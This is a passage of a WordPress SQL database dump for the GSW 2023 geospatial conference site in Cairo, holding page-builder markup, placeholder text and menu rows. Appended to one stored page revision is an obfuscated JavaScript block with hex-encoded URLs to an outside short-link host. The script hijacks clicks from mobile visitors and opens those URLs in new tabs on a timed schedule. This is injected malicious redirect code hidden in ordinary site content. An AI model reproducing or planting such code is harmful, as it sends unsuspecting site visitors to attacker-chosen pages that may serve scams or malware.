title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-thumbs-up\" icon_size=\"24\" icon_color=\"\" title=\"Quality software\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518063362{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-rocket\" icon_size=\"24\" icon_color=\"\" title=\"Innovative\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518383809{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon=\"icomoon-fontawesome-16x16-gem\" icon_size=\"24\" icon_color=\"\" title=\"Cost effective\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518233084{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-check-square\" icon_size=\"24\" icon_color=\"\" title=\"Transparent &amp; honest\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518135334{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-lightbulb\" icon_size=\"24\" icon_color=\"\" title=\"Creative\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518683161{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"``The time is always right to do what is right!``\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529525768333{padding-top: 70px !important;padding-bottom: 75px !important;}\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Our latest projects\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"]We provides a full spectrum s nisi lectus, pharetra eget leo id, hendrerit ultricies magna. Duis bibendum quam in elit accumsan venenatis.[/ultimate_heading][/vc_column][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-12 vc_col-md-offset-0 vc_col-md-12\"][dt_portfolio_carousel dis_posts_total=\"12\" content_alignment=\"center\" custom_content_bg_color=\"#f7f7f7\" post_content_paddings=\"20px 30px 30px 30px\" resized_image_dimensions=\"3x2\" image_border_radius=\"0px\" image_paddings=\"20px 20px 0px 20px\" slides_on_wide_desk=\"3\" slides_on_lapt=\"2\" slides_on_h_tabs=\"2\" slides_on_v_tabs=\"1\" post_title_font_size=\"22px\" post_title_line_height=\"32px\" post_date=\"n\" post_author=\"n\" post_comments=\"n\" post_content=\"off\" read_more_button=\"default_button\" read_more_button_text=\"Details\" project_icon_border_width=\"0px\" project_icon_color=\"#ffffff\" project_icon_color_hover=\"#ffffff\" next_icon=\"icon-ar-013-r\" prev_icon=\"icon-ar-013-l\" arrow_icon_size=\"32px\" arrow_bg_width=\"36x\" arrow_border_width=\"0px\" arrow_icon_color=\"rgba(0,0,0,0.15)\" arrows_bg_show=\"n\" arrow_icon_color_hover=\"\" arrows_bg_hover_show=\"n\" r_arrow_icon_paddings=\"0px 0px 0px 0px\" r_arrow_v_offset=\"0px\" l_arrow_icon_paddings=\"0px 0px 0px 0px\" l_arrow_v_offset=\"0px\" category=\"\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"Have a project you\'d like to talk about?\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Sed consequat erat vitae odio placerat, vel malesuada mi convallis we can help![/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527107907{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]VIEW SHOWCASE[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]I am text block. Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-04 05:21:47','2022-10-04 05:21:47','',2167,'https://gsw2023.com/?p=2280',0,'revision','',0),
(2281,1,'2023-09-16 22:41:12','2022-10-04 05:36:33','','Participate','','publish','closed','closed','','participate','','','2023-09-16 22:41:12','2023-09-16 22:41:12','',0,'https://gsw2023.com/?p=2281',20,'nav_menu_item','',0),
(2282,1,'2023-09-16 22:41:12','2022-10-04 05:36:33','','Travel Grants','','publish','closed','closed','','travel-grants','','','2023-09-16 22:41:12','2023-09-16 22:41:12','',0,'https://gsw2023.com/?p=2282',24,'nav_menu_item','',0),
(2283,1,'2023-09-16 22:41:12','2022-10-04 05:36:33','','Workshops','','publish','closed','closed','','workshops','','','2023-09-16 22:41:12','2023-09-16 22:41:12','',0,'https://gsw2023.com/?p=2283',25,'nav_menu_item','',0),
(2284,1,'2023-09-16 22:41:12','2022-10-04 05:36:33','','Sponsorship','','publish','closed','closed','','sponsorship','','','2023-09-16 22:41:12','2023-09-16 22:41:12','',0,'https://gsw2023.com/?p=2284',27,'nav_menu_item','',0),
(2285,1,'2023-09-16 22:41:12','2022-10-04 05:36:33','','Practical Information','','publish','closed','closed','','practical-information','','','2023-09-16 22:41:12','2023-09-16 22:41:12','',0,'https://gsw2023.com/?p=2285',29,'nav_menu_item','',0),
(2286,1,'2023-09-16 22:41:12','2022-10-04 05:36:33','','Contact Us','','publish','closed','closed','','contact-us','','','2023-09-16 22:41:12','2023-09-16 22:41:12','',0,'https://gsw2023.com/?p=2286',36,'nav_menu_item','',0),
(2287,1,'2022-10-05 10:43:49','2022-10-05 10:43:49','','n1','','inherit','open','closed','','n1','','','2022-10-05 10:43:49','2022-10-05 10:43:49','',0,'https://gsw2023.com/wp-content/uploads/2022/10/n1.jpg',0,'attachment','image/jpeg',0),
(2288,1,'2022-10-05 11:56:39','2022-10-05 11:56:39','','n2','','inherit','open','closed','','n2','','','2022-10-05 11:56:39','2022-10-05 11:56:39','',0,'https://gsw2023.com/wp-content/uploads/2022/10/n2.jpg',0,'attachment','image/jpeg',0),
(2289,1,'2022-10-05 12:58:44','2022-10-05 12:58:44','','AAST','','inherit','open','closed','','aast','','','2022-10-05 13:00:44','2022-10-05 13:00:44','',0,'https://gsw2023.com/wp-content/uploads/2022/10/AAST.jpg',0,'attachment','image/jpeg',0),
(2290,1,'2022-10-05 17:28:18','2022-10-05 17:28:18','','Default Kit','','inherit','closed','closed','','7-revision-v1','','','2022-10-05 17:28:18','2022-10-05 17:28:18','',7,'https://gsw2023.com/?p=2290',0,'revision','',0),
(2291,1,'2022-10-05 17:47:55','2022-10-05 17:47:55','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"]</p>\n<h5>As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. It is the primary factor for human achievements throughout all ages. AASTMT has a host of qualified professors and experts who are capable of supporting Arab and African countries in various scientific fields. The GSW will provide a platform for international scholars, graduate students, future scientists and industrial sectors to learn exchange knowledge and experiences of applying geospatial technologies for sustainable development for better quality of life for people around the world. We would like to take this opportunity to welcome you to Cairo a vibrant, exhilarating, exotic, fascinating and welcoming city. Home to the best Pharaonic, Coptic and Islamic sights in Egypt. Cairo is where you never know what incredible, half-forgotten monument you might stumble across while wandering around. Enjoy the Nile view, visit the great pyramids of Giza, walk through the capital\'s medieval markets by Khan El-Khalili, or walk down the Nile promenade. We look forward to working with the ISPRS council, commissions presidents, working group officers, and other sister organizations to have a successful technical program and a memorable social program. It is great to have the GSW coming to Egypt where most probably the first mapping systems were developed 1000s years ago. Welcome to GSW\'2023 in Cairo, Egypt.</h5>\n<p>[/ultimate_heading][vc_row_inner][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row equal_height=\"yes\" content_placement=\"middle\" bg_type=\"bg_color\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529517572787{padding-top: 70px !important;padding-bottom: 55px !important;}\" bg_color_value=\"rgba(170,170,170,0.1)\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"How can we help you?\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"]Our job is nisi lectus, pharetra eget leo id, hendrerit ultricies magna. Duis bibendum quam in elit accumsan, quis maximus urna venenatis.[/ultimate_heading][/vc_column][vc_column offset=\"vc_col-lg-offset-1 vc_col-lg-10 vc_col-md-offset-0 vc_col-md-12\"][vc_row_inner content_placement=\"top\"][vc_column_inner width=\"1/3\"][bsf-info-box icon=\"icomoon-fontawesome-16x16-users\" icon_size=\"24\" icon_color=\"\" title=\"Agile team\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529526716112{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-sitemap\" icon_size=\"24\" icon_color=\"\" title=\"Scrum\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529517895768{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-window-restore\" icon_size=\"24\" icon_color=\"\" title=\"TDD\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529517964919{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon=\"icomoon-fontawesome-16x16-code\" icon_size=\"24\" icon_color=\"\" title=\"Clean code\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518016290{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-thumbs-up\" icon_size=\"24\" icon_color=\"\" title=\"Quality software\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518063362{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-rocket\" icon_size=\"24\" icon_color=\"\" title=\"Innovative\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518383809{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" 